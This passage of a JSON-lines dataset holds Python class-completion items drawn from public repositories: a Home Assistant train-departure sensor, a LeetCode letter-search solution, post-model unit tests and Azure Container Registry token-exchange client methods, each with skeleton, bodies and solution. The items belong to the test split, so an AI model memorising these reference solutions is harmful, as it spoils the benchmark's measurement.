departuretime: time | None, entry_id: str) -> None: Initialize the sensor.\n- async def async_update(self) -> None: Retrieve latest state.\n- def _update_attributes(self, state: TrainStop) -> None: Return extra state attributes.", "prompted_full_text": "Implement the Python class `TrainSensor` described below.\n\nClass description:\nContains data about a train depature.\n\nMethod signatures and docstrings:\n- def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None: Initialize the sensor.\n- async def async_update(self) -> None: Retrieve latest state.\n- def _update_attributes(self, state: TrainStop) -> None: Return extra state attributes.\n\n<|skeleton|>\nclass TrainSensor:\n \"\"\"Contains data about a train depature.\"\"\"\n\n def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self) -> None:\n \"\"\"Retrieve latest state.\"\"\"\n <|body_1|>\n\n def _update_attributes(self, state: TrainStop) -> None:\n \"\"\"Return extra state attributes.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._train_api = train_api\n self._from_station = from_station\n self._to_station = to_station\n self._weekday = weekday\n self._time = departuretime\n self._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\n if TYPE_CHECKING:\n assert from_station.name and to_station.name\n self._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)\n<|end_body_0|>\n\n<|body_start_1|>\n when = dt.now()\n _state: TrainStop | None = None\n if self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\n try:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\n except (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\n if not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\n self._attr_available = True\n if TYPE_CHECKING:\n assert _state.advertised_time_at_location\n self._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\n if _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\n if _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\n self._update_attributes(_state)\n<|end_body_1|>\n\n<|body_start_2|>\n attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\n if (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\n if (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\n if (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\n if (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\n if (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\n if (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\n self._attr_extra_state_attributes = attributes\n<|end_body_2|>\n", "revision_id": "2e65b77b2b5c17919939481f327963abdfdc53f0", "skeleton": "<|skeleton|>\nclass TrainSensor:\n \"\"\"Contains data about a train depature.\"\"\"\n\n def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self) -> None:\n \"\"\"Retrieve latest state.\"\"\"\n <|body_1|>\n\n def _update_attributes(self, state: TrainStop) -> None:\n \"\"\"Return extra state attributes.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TrainSensor:\n \"\"\"Contains data about a train depature.\"\"\"\n\n def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n self._train_api = train_api\n self._from_station = from_station\n self._to_station = to_station\n self._weekday = weekday\n self._time = departuretime\n self._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\n if TYPE_CHECKING:\n assert from_station.name and to_station.name\n self._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)\n\n async def async_update(self) -> None:\n \"\"\"Retrieve latest state.\"\"\"\n when = dt.now()\n _state: TrainStop | None = None\n if self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\n try:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\n except (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\n if not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\n self._attr_available = True\n if TYPE_CHECKING:\n assert _state.advertised_time_at_location\n self._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\n if _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\n if _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\n self._update_attributes(_state)\n\n def _update_attributes(self, state: TrainStop) -> None:\n \"\"\"Return extra state attributes.\"\"\"\n attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\n if (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\n if (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\n if (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\n if (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\n if (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\n if (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\n self._attr_extra_state_attributes = attributes\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/trafikverket_train/sensor.py", "source_repo": "konnected-io/home-assistant", "split": "test", "star_events_count": 24} {"blob_id": "9003dd21cb8c403c2aa2935edf6a750781ac3ed4", "bodies": ["first = None\nheapq.heapify(letters)\nwhile len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\nreturn first", "for letter in letters:\n if letter > target:\n return letter\nreturn letters[0]"], "bodies_text": "<|body_start_0|>\n first = None\n heapq.heapify(letters)\n while len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\n return first\n<|end_body_0|>\n\n<|body_start_1|>\n for letter in letters:\n if letter > target:\n return letter\n return letters[0]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def nextGreatestLetter(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_0|>\n\n def nextGreatestLetter1(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n first = None\n heapq.heapify(letters)\n while len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\n return first\n<|end_body_0|>\n\n<|body_start_1|>\n for letter in letters:\n if letter > target:\n return letter\n return letters[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000096", "length_bytes": 3138, "license_type": "no_license", "methods": [{"docstring": ":type letters: List[str] :type target: str :rtype: str", "name": "nextGreatestLetter", "signature": "def nextGreatestLetter(self, letters, target)"}, {"docstring": ":type letters: List[str] :type target: str :rtype: str", "name": "nextGreatestLetter1", "signature": "def nextGreatestLetter1(self, letters, target)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005236", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nextGreatestLetter(self, letters, target): :type letters: List[str] :type target: str :rtype: str\n- def nextGreatestLetter1(self, letters, target): :type letters: List[str] :type target: str :rtype: str", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nextGreatestLetter(self, letters, target): :type letters: List[str] :type target: str :rtype: str\n- def nextGreatestLetter1(self, letters, target): :type letters: List[str] :type target: str :rtype: str\n\n<|skeleton|>\nclass Solution:\n\n def nextGreatestLetter(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_0|>\n\n def nextGreatestLetter1(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n first = None\n heapq.heapify(letters)\n while len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\n return first\n<|end_body_0|>\n\n<|body_start_1|>\n for letter in letters:\n if letter > target:\n return letter\n return letters[0]\n<|end_body_1|>\n", "revision_id": "233d12deca34f51c3bb0406831cc07f3b72b50cf", "skeleton": "<|skeleton|>\nclass Solution:\n\n def nextGreatestLetter(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_0|>\n\n def nextGreatestLetter1(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def nextGreatestLetter(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n first = None\n heapq.heapify(letters)\n while len(letters) != 0:\n source = heapq.heappop(letters)\n if source > target:\n return source\n if first is None:\n first = source\n return first\n\n def nextGreatestLetter1(self, letters, target):\n \"\"\":type letters: List[str] :type target: str :rtype: str\"\"\"\n for letter in letters:\n if letter > target:\n return letter\n return letters[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "Python/Find Smallest Letter Greater Than Target/main.py", "source_repo": "briansu2004/MyLeet", "split": "test", "star_events_count": 1} {"blob_id": "9969bb43a3acffc8f2c9d7912512c9c95b79404c", "bodies": ["post = PostFactory()\ncomment = PostFactory()\npost.add_comment(comment)\nself.assertEqual(comment.title, post.title)\nself.assertTrue(comment.is_comment)\nself.assertEqual(comment.parent_post, post)", "post = PostFactory()\nreactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\nfor reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\nself.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])"], "bodies_text": "<|body_start_0|>\n post = PostFactory()\n comment = PostFactory()\n post.add_comment(comment)\n self.assertEqual(comment.title, post.title)\n self.assertTrue(comment.is_comment)\n self.assertEqual(comment.parent_post, post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = PostFactory()\n reactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\n for reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\n self.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TestPost", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestPost:\n\n def test_add_comment(self):\n \"\"\"Test adding comment to post\"\"\"\n <|body_0|>\n\n def test_get_reaction_count(self):\n \"\"\"Test function return correct urls with count\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n post = PostFactory()\n comment = PostFactory()\n post.add_comment(comment)\n self.assertEqual(comment.title, post.title)\n self.assertTrue(comment.is_comment)\n self.assertEqual(comment.parent_post, post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = PostFactory()\n reactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\n for reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\n self.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000097", "length_bytes": 1139, "license_type": "no_license", "methods": [{"docstring": "Test adding comment to post", "name": "test_add_comment", "signature": "def test_add_comment(self)"}, {"docstring": "Test function return correct urls with count", "name": "test_get_reaction_count", "signature": "def test_get_reaction_count(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001438", "prompt": "Implement the Python class `TestPost` described below.\n\nClass description:\nImplement the TestPost class.\n\nMethod signatures and docstrings:\n- def test_add_comment(self): Test adding comment to post\n- def test_get_reaction_count(self): Test function return correct urls with count", "prompted_full_text": "Implement the Python class `TestPost` described below.\n\nClass description:\nImplement the TestPost class.\n\nMethod signatures and docstrings:\n- def test_add_comment(self): Test adding comment to post\n- def test_get_reaction_count(self): Test function return correct urls with count\n\n<|skeleton|>\nclass TestPost:\n\n def test_add_comment(self):\n \"\"\"Test adding comment to post\"\"\"\n <|body_0|>\n\n def test_get_reaction_count(self):\n \"\"\"Test function return correct urls with count\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n post = PostFactory()\n comment = PostFactory()\n post.add_comment(comment)\n self.assertEqual(comment.title, post.title)\n self.assertTrue(comment.is_comment)\n self.assertEqual(comment.parent_post, post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = PostFactory()\n reactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\n for reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\n self.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])\n<|end_body_1|>\n", "revision_id": "4089c3f084d7460f64517158eefb54b3b93a01e8", "skeleton": "<|skeleton|>\nclass TestPost:\n\n def test_add_comment(self):\n \"\"\"Test adding comment to post\"\"\"\n <|body_0|>\n\n def test_get_reaction_count(self):\n \"\"\"Test function return correct urls with count\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestPost:\n def test_add_comment(self):\n \"\"\"Test adding comment to post\"\"\"\n post = PostFactory()\n comment = PostFactory()\n post.add_comment(comment)\n self.assertEqual(comment.title, post.title)\n self.assertTrue(comment.is_comment)\n self.assertEqual(comment.parent_post, post)\n\n def test_get_reaction_count(self):\n \"\"\"Test function return correct urls with count\"\"\"\n post = PostFactory()\n reactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\n for reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\n self.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])\n", "source": "the_stack_v2_python_sparse", "source_path": "apps/posts/tests.py", "source_repo": "maxwell912/social-app", "split": "test", "star_events_count": 0} {"blob_id": "a93d2d689109b36239173c0104826ff19bb3c541", "bodies": ["error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\nerror_map.update(kwargs.pop('error_map', {}) or {})\n_headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n_params = case_insensitive_dict(kwargs.pop('params', {}) or {})\napi_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\ncontent_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\ncls = kwargs.pop('cls', None)\n_data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\nrequest = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\npath_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\nrequest.url = self._client.format_url(request.url, **path_format_arguments)\npipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\nresponse = pipeline_response.http_response\nif response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\ndeserialized = self._deserialize('AcrRefreshToken', pipeline_response)\nif cls:\n return cls(pipeline_response, deserialized, {})\nreturn deserialized", "error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\nerror_map.update(kwargs.pop('error_map', {}) or {})\n_headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n_params = case_insensitive_dict(kwargs.pop('params', {}) or {})\napi_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\ncontent_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\ncls = kwargs.pop('cls', None)\n_data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\nrequest = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\npath_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\nrequest.url = self._client.format_url(request.url, **path_format_arguments)\npipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\nresponse = pipeline_response.http_response\nif response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\ndeserialized = self._deserialize('AcrAccessToken', pipeline_response)\nif cls:\n return cls(pipeline_response, deserialized, {})\nreturn deserialized"], "bodies_text": "<|body_start_0|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\n request = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrRefreshToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_0|>\n\n<|body_start_1|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\n request = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrAccessToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_1|>\n", "class_docstring": "", "class_name": "AuthenticationOperations", "detected_licenses": ["LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AuthenticationOperations:\n\n async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken:\n \"\"\"Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\"\"\"\n <|body_0|>\n\n async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken:\n \"\"\"Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\n request = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrRefreshToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_0|>\n\n<|body_start_1|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\n request = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrAccessToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000098", "length_bytes": 8679, "license_type": "permissive", "methods": [{"docstring": "Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default", "name": "exchange_aad_access_token_for_acr_refresh_token", "signature": "async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken"}, {"docstring": "Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A", "name": "exchange_acr_refresh_token_for_acr_access_token", "signature": "async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007292", "prompt": "Implement the Python class `AuthenticationOperations` described below.\n\nClass description:\nImplement the AuthenticationOperations class.\n\nMethod signatures and docstrings:\n- async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken: Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\n- async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken: Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A", "prompted_full_text": "Implement the Python class `AuthenticationOperations` described below.\n\nClass description:\nImplement the AuthenticationOperations class.\n\nMethod signatures and docstrings:\n- async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, 